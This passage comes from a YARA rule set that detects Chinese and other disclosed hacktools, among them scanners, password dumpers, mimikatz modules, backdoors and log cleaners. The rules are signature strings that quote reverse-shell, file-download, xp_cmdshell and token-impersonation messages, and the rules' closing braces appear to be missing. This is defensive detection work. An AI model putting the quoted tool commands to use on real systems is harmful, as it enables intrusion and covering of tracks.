   		hash = "d5646e86b5257f9c83ea23eca3d86de336224e55"   
   	strings:   
   		$s0 = "FScan v1.12 - Command line port scanner." fullword ascii   
   		$s2 = " -n    - no port scanning - only pinging (unless you use -q)" fullword ascii   
   		$s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" fullword ascii   
   		$s6 = " -z    - maximum simultaneous threads to use for scanning" fullword ascii   
   		$s12 = "Failed to open the IP list file \"%s\"" fullword ascii   
   		$s13 = "http://www.foundstone.com" fullword ascii   
   		$s16 = " -p    - TCP port(s) to scan (a comma separated list of ports/ranges) " fullword ascii   
   		$s18 = "Bind port number out of range. Using system default." fullword ascii   
   		$s19 = "fscan.exe" fullword wide   
   	condition:   
   		4 of them   
rule FreeVersion_debug {   
   	meta:   
   		description = "Chinese Hacktool Set - file debug.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "d11e6c6f675b3be86e37e50184dadf0081506a89"   
   	strings:   
   		$s0 = "c:\\Documents and Settings\\Administrator\\" fullword ascii   
   		$s1 = "Got WMI process Pid: %d" ascii   
   		$s2 = "This exploit will execute" ascii   
   		$s6 = "Found token %s " ascii   
   		$s7 = "Running reverse shell" ascii   
   		$s10 = "wmiprvse.exe" fullword ascii   
   		$s12 = "SELECT * FROM IIsWebInfo" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 820KB and 3 of them   
rule CN_Hacktool_1433_Scanner_Comp2 {   
   	meta:   
   		description = "Detects a chinese MSSQL scanner - component 2"   
   		author = "Florian Roth"   
   		score = 40   
   		date = "12.10.2014"   
   	strings:   
   		$magic = { 4d 5a }   
   		$s0 = "1433" wide fullword   
   		$s1 = "1433V" wide   
   		$s2 = "UUUMUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUfUUUMUUU" ascii fullword   
   	condition:   
   		( $magic at 0 ) and all of ($s*)   
rule IDTools_For_WinXP_IdtTool_2 {   
   	meta:   
   		description = "Chinese Hacktool Set - file IdtTool.sys"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "07feb31dd21d6f97614118b8a0adf231f8541a67"   
   	strings:   
   		$s0 = "\\Device\\devIdtTool" fullword wide   
   		$s1 = "IoDeleteSymbolicLink" fullword ascii  /* Goodware String - occured 467 times */   
   		$s3 = "IoDeleteDevice" fullword ascii  /* Goodware String - occured 993 times */   
   		$s6 = "IoCreateSymbolicLink" fullword ascii /* Goodware String - occured 467 times */   
   		$s7 = "IoCreateDevice" fullword ascii /* Goodware String - occured 988 times */   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 7KB and all of them   
rule Hacktools_CN_Panda_Burst {   
   	meta:   
   		description = "Disclosed hacktool set - file Burst.rar"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "ce8e3d95f89fb887d284015ff2953dbdb1f16776"   
   	strings:   
   		$s0 = "@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr." ascii   
   	condition:   
   		all of them   
rule Antiy_Ports_1_21 {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0"   
   	strings:   
   		$s0 = "AntiyPorts.EXE" fullword wide   
   		$s7 = "AntiyPorts MFC Application" fullword wide   
   		$s20 = " @Stego:" fullword ascii   
   	condition:   
   		all of them   
rule WSockExpert {   
   	meta:   
   		description = "Chinese Hacktool Set - file WSockExpert.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "2962bf7b0883ceda5e14b8dad86742f95b50f7bf"   
   	strings:   
   		$s1 = "OpenProcessCmdExecute!" fullword ascii   
   		$s2 = "http://www.hackp.com" fullword ascii   
   		$s3 = "'%s' is not a valid time!'%s' is not a valid date and time" fullword wide   
   		$s4 = "SaveSelectedFilterCmdExecute" fullword ascii   
   		$s5 = "PasswordChar@" fullword ascii   
   		$s6 = "WSockHook.DLL" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 2500KB and 4 of them   
rule WebCrack4_RouterPasswordCracking {   
   	meta:   
   		description = "Chinese Hacktool Set - file WebCrack4-RouterPasswordCracking.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "00c68d1b1aa655dfd5bb693c13cdda9dbd34c638"   
   	strings:   
   		$s0 = "http://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORD" fullword ascii   
   		$s1 = "Username: \"%s\", Password: \"%s\", Remarks: \"%s\"" fullword ascii   
   		$s14 = "user:\"%s\" pass: \"%s\" result=\"%s\"" fullword ascii   
   		$s16 = "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)" fullword ascii   
   		$s20 = "List count out of bounds (%d)+Operation not allowed on sorted string list%String" wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 5000KB and 2 of them   
rule PwDump   
   {   
   	meta:   
   		description = "PwDump 6 variant"   
   		author = "Marc Stroebel"   
   		date = "2014-04-24"   
   		score = 70   
   	strings:   
   		$s5 = "Usage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machineNa"   
   		$s6 = "Unable to query service status. Something is wrong, please manually check the st"   
   		$s7 = "pwdump6 Version %s by fizzgig and the mighty group at foofus.net" fullword   
   	condition:   
   		all of them   
rule iKAT_command_lines_agent {   
   	meta:   
   		description = "iKAT hack tools set agent - file ikat.exe"   
   		author = "Florian Roth"   
   		date = "05.11.14"   
   		score = 75   
   		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"   
   		hash = "c802ee1e49c0eae2a3fc22d2e82589d857f96d94"   
   	strings:   
   		$s0 = "Extended Module: super mario brothers" fullword ascii   
   		$s1 = "Extended Module: " fullword ascii   
   		$s3 = "ofpurenostalgicfeeling" fullword ascii   
   		$s8 = "-supermariobrotheretic" fullword ascii   
   		$s9 = "!http://132.147.96.202:80" fullword ascii   
   		$s12 = "iKAT Exe Template" fullword ascii   
   		$s15 = "withadancyflavour.." fullword ascii   
   		$s16 = "FastTracker v2.00   " fullword ascii   
   	condition:   
   		4 of them   
rule CN_Tools_srss_2 {   
   	meta:   
   		description = "Chinese Hacktool Set - file srss.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "c418b30d004051bbf1b2d3be426936b95b5fea6f"   
   	strings:   
   		$x1 = "used pepack!" fullword ascii   
      
   		$s1 = "KERNEL32.dll" fullword ascii   
   		$s2 = "KERNEL32.DLL" fullword ascii   
   		$s3 = "LoadLibraryA" fullword ascii   
   		$s4 = "GetProcAddress" fullword ascii   
   		$s5 = "VirtualProtect" fullword ascii   
   		$s6 = "VirtualAlloc" fullword ascii   
   		$s7 = "VirtualFree" fullword ascii   
   		$s8 = "ExitProcess" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and ( $x1 at 0 ) and filesize < 14KB and all of ($s*)   
rule churrasco {   
   	meta:   
   		description = "Chinese Hacktool Set - file churrasco.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "a8d4c177948a8e60d63de9d0ed948c50d0151364"   
   	strings:   
   		$s1 = "Done, command should have ran as SYSTEM!" ascii   
   		$s2 = "Running command with SYSTEM Token..." ascii   
   		$s3 = "Thread impersonating, got NETWORK SERVICE Token: 0x%x" ascii   
   		$s4 = "Found SYSTEM token 0x%x" ascii   
   		$s5 = "Thread not impersonating, looking for another thread..." ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 150KB and 2 of them   
rule GoodToolset_pr {   
   	meta:   
   		description = "Chinese Hacktool Set - file pr.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "f6676daf3292cff59ef15ed109c2d408369e8ac8"   
   	strings:   
   		$s1 = "-->Got WMI process Pid: %d " ascii   
   		$s2 = "-->This exploit gives you a Local System shell " ascii   
   		$s3 = "wmiprvse.exe" fullword ascii   
   		$s4 = "Try the first %d time" fullword ascii   
   		$s5 = "-->Build&&Change By p " ascii   
   		$s6 = "root\\MicrosoftIISv2" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 200KB and all of them   
rule aspbackdoor_asp3 {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file asp3.txt"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c"   
   	strings:   
   		$s0 = "<form action=\"changepwd.asp\" method=\"post\"> " fullword ascii   
   		$s1 = "  Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " fullword ascii   
   		$s2 = "    value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " fullword ascii   
   		$s14 = " Windows NT " fullword ascii   
   		$s16 = " WIndows 2000 " fullword ascii   
   		$s18 = "OldPwd = Request.Form(\"OldPwd\") " fullword ascii   
   		$s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " fullword ascii   
   		$s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " fullword ascii   
   	condition:   
   		all of them   
rule Radmin_Hash {   
   	meta:   
   		description = "Chinese Hacktool Set - file Radmin_Hash.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "be407bd5bf5bcd51d38d1308e17a1731cd52f66b"   
   	strings:   
   		$s1 = "<description>IEBars</description>" fullword ascii   
   		$s2 = "PECompact2" fullword ascii   
   		$s3 = "Radmin, Remote Administrator" fullword wide   
   		$s4 = "Radmin 3.0 Hash " fullword wide   
   		$s5 = "HASH1.0" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 600KB and all of them   
rule _FsHttp_FsPop_FsSniffer {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		super_rule = 1   
   		hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f"   
   		hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9"   
   		hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8"   
   	strings:   
   		$s0 = "-ERR Invalid Command, Type [Help] For Command List" fullword   
   		$s1 = "-ERR Get SMS Users ID Failed" fullword   
   		$s2 = "Control Time Out 90 Secs, Connection Closed" fullword   
   		$s3 = "-ERR Post SMS Failed" fullword   
   		$s4 = "Current.hlt" fullword   
   		$s6 = "Histroy.hlt" fullword   
   		$s7 = "-ERR Send SMS Failed" fullword   
   		$s12 = "-ERR Change Password <New Password>" fullword   
   		$s17 = "+OK Send SMS Succussifully" fullword   
   		$s18 = "+OK Set New Password: [%s]" fullword   
   		$s19 = "CHANGE PASSWORD" fullword   
   	condition:   
   		all of them   
rule ByPassFireWall_zip_Folder_Inject {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file Inject.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728"   
   	strings:   
   		$s6 = "Fail To Inject" fullword ascii   
   		$s7 = "BtGRemote Pro; V1.5 B/{" fullword ascii   
   		$s11 = " Successfully" fullword ascii   
   	condition:   
   		all of them   
rule dat_NaslLib {   
   	meta:   
   		description = "Chinese Hacktool Set - file NaslLib.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "fb0d4263118faaeed2d68e12fab24c59953e862d"   
   	strings:   
   		$s1 = "nessus_get_socket_from_connection: fd <%d> is closed" fullword ascii   
   		$s2 = "[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%d" fullword ascii   
   		$s3 = "A FsSniffer backdoor seems to be running on this port%s" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 1360KB and all of them   
rule Hacktools_CN_Scan_BAT {   
   	meta:   
   		description = "Disclosed hacktool set - file scan.bat"   
   		author = "Florian Roth"   
   		date = "17.11.14"   
   		score = 60   
   		hash = "6517d7c245f1300e42f7354b0fe5d9666e5ce52a"   
   	strings:   
   		$s0 = "for /f %%a in (host.txt) do (" fullword ascii   
   		$s1 = "for /f \"eol=S tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txt" fullword ascii   
   		$s2 = "del host.txt /q" fullword ascii   
   		$s3 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii   
   		$s4 = "start Http.exe %%a %http%" fullword ascii   
   		$s5 = "for /f \"eol=P tokens=1 delims= \" %%i in (s1.txt) do echo %%i>>s2.txt" fullword ascii   
   	condition:   
   		5 of them   
rule Dos_NC {   
   	meta:   
   		description = "Chinese Hacktool Set - file NC.EXE"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "57f0839433234285cc9df96198a6ca58248a4707"   
   	strings:   
   		$s1 = "nc -l -p port [options] [hostname] [port]" fullword ascii   
   		$s2 = "invalid connection to [%s] from %s [%s] %d" fullword ascii   
   		$s3 = "post-rcv getsockname failed" fullword ascii   
   		$s4 = "Failed to execute shell, error = %s" fullword ascii   
   		$s5 = "UDP listen needs -p arg" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 290KB and all of them   
rule portscanner {   
   	meta:   
   		description = "Chinese Hacktool Set - file portscanner.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "1de367d503fdaaeee30e8ad7c100dd1e320858a4"   
   	strings:   
   		$s0 = "PortListfNo" fullword ascii   
   		$s1 = ".533.net" fullword ascii   
   		$s2 = "CRTDLL.DLL" fullword ascii   
   		$s3 = "exitfc" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 25KB and all of them   
rule CN_Tools_Vscan {   
   	meta:   
   		description = "Chinese Hacktool Set - file Vscan.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "0365fe05e2de0f327dfaa8cd0d988dbb7b379612"   
   	strings:   
   		$s1 = "[+] Usage: VNC_bypauth <target> <scantype> <option>" fullword ascii   
   		$s2 = "========RealVNC <= 4.1.1 Bypass Authentication Scanner=======" fullword ascii   
   		$s3 = "[+] Type VNC_bypauth <target>,<scantype> or <option> for more informations" fullword ascii   
   		$s4 = "VNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,..." fullword ascii   
   		$s5 = "-vn:%-15s:%-7d  connection closed" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 60KB and 2 of them   
rule SuperScan4 {   
   	meta:   
   		description = "Auto-generated rule on file SuperScan4.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "78f76428ede30e555044b83c47bc86f0"   
   	strings:   
   		$s2 = " td class=\"summO1\">"   
   		$s6 = "REM'EBAqRISE"   
   		$s7 = "CorExitProcess'msc#e"   
   	condition:   
   		all of them   
      
rule CmdShell64 {   
   	meta:   
   		description = "Chinese Hacktool Set - file CmdShell64.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "5b92510475d95ae5e7cd6ec4c89852e8af34acf1"   
   	strings:   
   		$s1 = "C:\\Windows\\System32\\JAVASYS.EXE" fullword wide   
   		$s2 = "ServiceCmdShell" fullword ascii   
   		$s3 = "<!-- If your application is designed to work with Windows 8.1, uncomment the fol" ascii   
   		$s4 = "ServiceSystemShell" fullword wide   
   		$s5 = "[Root@CmdShell ~]#" fullword wide   
   		$s6 = "Hello Man 2015 !" fullword wide   
   		$s7 = "CmdShell" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 30KB and 4 of them   
rule Pc_rejoice {   
   	meta:   
   		description = "Chinese Hacktool Set - file rejoice.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "fe634a9f5d48d5c64c8f8bfd59ac7d8965d8f372"   
   	strings:   
   		$s1 = "@members.3322.net/dyndns/update?system=dyndns&hostname=" fullword ascii   
   		$s2 = "http://www.xxx.com/xxx.exe" fullword ascii   
   		$s3 = "@ddns.oray.com/ph/update?hostname=" fullword ascii   
   		$s4 = "No data to read.$Can not bind in port range (%d - %d)" fullword wide   
   		$s5 = "ListViewProcessListColumnClick!" fullword ascii   
   		$s6 = "http://iframe.ip138.com/ic.asp" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 3000KB and 3 of them   
rule MSSqlPass {   
   	meta:   
   		description = "Chinese Hacktool Set - file MSSqlPass.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "172b4e31ed15d1275ac07f3acbf499daf9a055d7"   
   	strings:   
   		$s0 = "Reveals the passwords stored in the Registry by Enterprise Manager of SQL Server" wide   
   		$s1 = "empv.exe" fullword wide   
   		$s2 = "Enterprise Manager PassView" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 120KB and all of them   
rule SqlDbx_zhs {   
   	meta:   
   		description = "Chinese Hacktool Set - file SqlDbx_zhs.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "e34228345498a48d7f529dbdffcd919da2dea414"   
   	strings:   
   		$s0 = "S.failed_logins \"Failed Login Attempts\", " fullword ascii   
   		$s7 = "SELECT ROLE, PASSWORD_REQUIRED FROM SYS.DBA_ROLES ORDER BY ROLE" fullword ascii   
   		$s8 = "SELECT spid 'SPID', status 'Status', db_name (dbid) 'Database', loginame 'Login'" ascii   
   		$s9 = "bcp.exe <:schema:>.<:table:> out \"<:file:>\" -n -S <:server:> -U <:user:> -P <:" ascii   
   		$s11 = "L.login_policy_name AS \"Login Policy\", " fullword ascii   
   		$s12 = "mailto:support@sqldbx.com" fullword ascii   
   		$s15 = "S.last_login_time \"Last Login\", " fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and 4 of them   
rule CN_Hacktool_1433_Scanner {   
   	meta:   
   		description = "Detects a chinese MSSQL scanner"   
   		author = "Florian Roth"   
   		score = 40   
   		date = "12.10.2014"   
   	strings:   
   		$magic = { 4d 5a }   
   		$s0 = "1433" wide fullword   
   		$s1 = "1433V" wide   
   		$s2 = "del Weak1.txt" ascii fullword   
   		$s3 = "del Attack.txt" ascii fullword   
   		$s4 = "del /s /Q C:\\Windows\\system32\\doors\\" fullword ascii   
   		$s5 = "!&start iexplore http://www.crsky.com/soft/4818.html)" fullword ascii   
   	condition:   
   		( $magic at 0 ) and all of ($s*)   
rule OtherTools_servu {   
   	meta:   
   		description = "Chinese Hacktool Set - file svu.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "5c64e6879a9746a0d65226706e0edc7a"   
   	strings:   
   		$s0 = "MZKERNEL32.DLL" fullword ascii   
   		$s1 = "UpackByDwing@" fullword ascii   
   		$s2 = "GetProcAddress" fullword ascii   
   		$s3 = "WriteFile" fullword ascii   
   	condition:   
   		$s0 at 0 and filesize < 50KB and all of them   
rule Sword1_5 {   
   	meta:   
   		description = "Chinese Hacktool Set - file Sword1.5.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "96ee5c98e982aa8ed92cb4cedb85c7fda873740f"   
   	strings:   
   		$s3 = "http://www.ip138.com/ip2city.asp" fullword wide   
   		$s4 = "http://www.md5decrypter.co.uk/feed/api.aspx?" fullword wide   
   		$s6 = "ListBox_Command" fullword wide   
   		$s13 = "md=7fef6171469e80d32c0559f88b377245&submit=MD5+Crack" fullword wide   
   		$s18 = "\\Set.ini" fullword wide   
   		$s19 = "OpenFileDialog1" fullword wide   
   		$s20 = " (*.txt)|*.txt" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 400KB and 4 of them   
rule IISPutScannesr {   
   	meta:   
   		description = "Chinese Hacktool Set - file IISPutScannesr.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "2dd8fee20df47fd4eed5a354817ce837752f6ae9"   
   	strings:   
   		$s1 = "yoda & M.o.D." ascii   
   		$s2 = "-> come.to/f2f **************" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 500KB and all of them   
rule Win32_klock {   
   	meta:   
   		description = "Chinese Hacktool Set - file klock.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "7addce4434670927c4efaa560524680ba2871d17"   
   	strings:   
   		$s1 = "klock.dll" fullword ascii   
   		$s2 = "Erreur : impossible de basculer le bureau ; SwitchDesktop : " fullword wide   
   		$s3 = "klock de mimikatz pour Windows" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 250KB and all of them   
rule kappfree_2 {   
   	meta:   
   		description = "Chinese Hacktool Set - file kappfree.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "5d578df9a71670aa832d1cd63379e6162564fb6b"   
   	strings:   
   		$s1 = "kappfree.dll" fullword ascii   
   		$s2 = "kappfree de mimikatz pour Windows (anti AppLocker)" fullword wide   
   		$s3 = "' introuvable !" fullword wide   
   		$s4 = "kiwi\\mimikatz" fullword wide   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 200KB and 2 of them   
rule CleanIISLog {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"   
   	strings:   
   		$s1 = "CleanIP - Specify IP Address Which You Want Clear." fullword ascii   
   		$s2 = "LogFile - Specify Log File Which You Want Process." fullword ascii   
   		$s8 = "CleanIISLog Ver" fullword ascii   
   		$s9 = "msftpsvc" fullword ascii   
   		$s10 = "Fatal Error: MFC initialization failed" fullword ascii   
   		$s11 = "Specified \"ALL\" Will Process All Log Files." fullword ascii   
   		$s12 = "Specified \".\" Will Clean All IP Record." fullword ascii   
   		$s16 = "Service %s Stopped." fullword ascii   
   		$s20 = "Process Log File %s..." fullword ascii   
   	condition:   
   		5 of them   
rule PLUGIN_TracKid {   
   	meta:   
   		description = "Chinese Hacktool Set - file TracKid.dll"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "a114181b334e850d4b33e9be2794f5bb0eb59a09"   
   	strings:   
   		$s0 = "E-mail: cracker_prince@163.com" fullword ascii   
   		$s1 = ".\\TracKid Log\\%s.txt" fullword ascii   
   		$s2 = "Coded by prince" fullword ascii   
   		$s3 = "TracKid.dll" fullword ascii   
   		$s4 = ".\\TracKid Log" fullword ascii   
   		$s5 = "%08x -- %s" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 200KB and 3 of them   
rule iKAT_wmi_rundll {   
   	meta:   
   		description = "This exe will attempt to use WMI to Call the Win32_Process event to spawn rundll - file wmi_rundll.exe"   
   		author = "Florian Roth"   
   		date = "05.11.14"   
   		score = 65   
   		reference = "http://ikat.ha.cked.net/Windows/functions/ikatfiles.html"   
   		hash = "97c4d4e6a644eed5aa12437805e39213e494d120"   
   	strings:   
   		$s0 = "This operating system is not supported." fullword ascii   
   		$s1 = "Error!" fullword ascii   
   		$s2 = "Win32 only!" fullword ascii   
   		$s3 = "COMCTL32.dll" fullword ascii   
   		$s4 = "[LordPE]" ascii   
   		$s5 = "CRTDLL.dll" fullword ascii   
   		$s6 = "VBScript" fullword ascii   
   		$s7 = "CoUninitialize" fullword ascii   
   	condition:   
   		all of them and filesize < 15KB   
rule mimikatz_kirbi_ticket   
   {   
   	meta:   
   		description		= "KiRBi ticket for mimikatz"   
   		author			= "Benjamin DELPY (gentilkiwi)"   
      
   	strings:   
   		$asn1			= { 76 82 ?? ?? 30 82 ?? ?? a0 03 02 01 05 a1 03 02 01 16 }   
      
   	condition:   
   		$asn1 at 0   
rule BypassUacDll_7 {   
   	meta:   
   		description = "Auto-generated rule - file BypassUacDll.aps"   
   		author = "yarGen Yara Rule Generator"   
   		hash = "58d7b24b6870cb7f1ec4807d2f77dd984077e531"   
   	strings:   
   		$s3 = "BypassUacDLL.dll" fullword wide   
   		$s4 = "AFX_IDP_COMMAND_FAILURE" fullword ascii   
   	condition:   
   		all of them   
rule sig_238_letmein {   
   	meta:   
   		description = "Disclosed hacktool set (old stuff) - file letmein.exe"   
   		author = "Florian Roth"   
   		date = "23.11.14"   
   		score = 60   
   		hash = "74d223a56f97b223a640e4139bb9b94d8faa895d"   
   	strings:   
   		$s1 = "Error get globalgroup memebers: NERR_InvalidComputer" fullword ascii   
   		$s6 = "Error get users from server!" fullword ascii   
   		$s7 = "get in nt by name and null" fullword ascii   
   		$s16 = "get something from nt, hold by killusa." fullword ascii   
   	condition:   
   		all of them   
rule aolipsniffer {   
   	meta:   
   		description = "Auto-generated rule on file aolipsniffer.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "51565754ea43d2d57b712d9f0a3e62b8"   
   	strings:   
   		$s0 = "C:\\Program Files\\Microsoft Visual Studio\\VB98\\VB6.OLB"   
   		$s1 = "dwGetAddressForObject"   
   		$s2 = "Color Transfer Settings"   
   		$s3 = "FX Global Lighting Angle"   
   		$s4 = "Version compatibility info"   
   		$s5 = "New Windows Thumbnail"   
   		$s6 = "Layer ID Generator Base"   
   		$s7 = "Color Halftone Settings"   
   		$s8 = "C:\\WINDOWS\\SYSTEM\\MSWINSCK.oca"   
   	condition:   
   		all of them   
rule Beastdoor_Backdoor {   
   	meta:   
   		description = "Detects the backdoor Beastdoor"   
   		author = "Florian Roth"   
   		score = 55   
   		hash = "5ab10dda548cb821d7c15ebcd0a9f1ec6ef1a14abcc8ad4056944d060c49535a"   
   	strings:   
   		$s0 = "Redirect SPort RemoteHost RPort  -->Port Redirector" fullword   
   		$s1 = "POST /scripts/WWPMsg.dll HTTP/1.0" fullword   
   		$s2 = "http://IP/a.exe a.exe            -->Download A File" fullword   
   		$s7 = "Host: wwp.mirabilis.com:80" fullword   
   		$s8 = "%s -Set Port PortNumber              -->Set The Service Port" fullword   
   		$s11 = "Shell                            -->Get A Shell" fullword   
   		$s14 = "DeleteService ServiceName        -->Delete A Service" fullword   
   		$s15 = "Getting The UserName(%c%s%c)-->ID(0x%s) Successfully" fullword   
   		$s17 = "%s -Set ServiceName ServiceName      -->Set The Service Name" fullword   
   	condition:   
   		2 of them   
rule mswin_check_lm_group {   
   	meta:   
   		description = "Chinese Hacktool Set - file mswin_check_lm_group.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "115d87d7e7a3d08802a9e5fd6cd08e2ec633c367"   
   	strings:   
   		$s1 = "Valid_Global_Groups: checking group membership of '%s\\%s'." fullword ascii   
   		$s2 = "Usage: %s [-D domain][-G][-P][-c][-d][-h]" fullword ascii   
   		$s3 = "-D    default user Domain" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 380KB and all of them   
rule WMI_vbs : APT   
   {   
       meta:   
           description = "WMI Tool - APT"   
           author = "Florian Roth"   
           release_date = "2013-11-29"   
           confidential = false   
   		score = 70   
       strings:   
   		$s3 = "WScript.Echo \"   $$\\      $$\\ $$\\      $$\\ $$$$$$\\ $$$$$$$$\\ $$\\   $$\\ $$$$$$$$\\  $$$$$$"   
       condition:   
           all of them   
rule CN_Toolset_sig_1433_135_sqlr {   
   	meta:   
   		description = "Detects a Chinese hacktool from a disclosed toolset - file sqlr.exe"   
   		author = "Florian Roth"   
   		reference = "http://qiannao.com/ls/905300366/33834c0c/"   
   		reference2 = "https://raw.githubusercontent.com/Neo23x0/Loki/master/signatures/thor-hacktools.yar"   
   		date = "2015/03/30"   
   		score = 70   
   		hash = "8542c7fb8291b02db54d2dc58cd608e612bfdc57"   
   	strings:   
   		$s0 = "Connect to %s MSSQL server success. Type Command at Prompt." fullword ascii   
   		$s11 = ";DATABASE=master" fullword ascii   
   		$s12 = "xp_cmdshell '" fullword ascii   
   		$s14 = "SELECT * FROM OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;Data Source=myserver" ascii   
   	condition:   
   		all of them   
rule CN_Tools_pc {   
   	meta:   
   		description = "Chinese Hacktool Set - file pc.exe"   
   		author = "Florian Roth"   
   		reference = "http://tools.zjqhr.com/"   
   		date = "2015-06-13"   
   		hash = "5cf8caba170ec461c44394f4058669d225a94285"   
   	strings:   
   		$s0 = "\\svchost.exe" fullword ascii   
   		$s2 = "%s%08x.001" fullword ascii   
   		$s3 = "Qy001Service" fullword ascii   
   		$s4 = "/.MIKY" fullword ascii   
   	condition:   
   		uint16(0) == 0x5a4d and filesize < 300KB and all of them   
rule portscan {   
   	meta:   
   		description = "Auto-generated rule on file portscan.exe"   
   		author = "yarGen Yara Rule Generator by Florian Roth"   
   		hash = "a8bfdb2a925e89a281956b1e3bb32348"   
   	strings:   
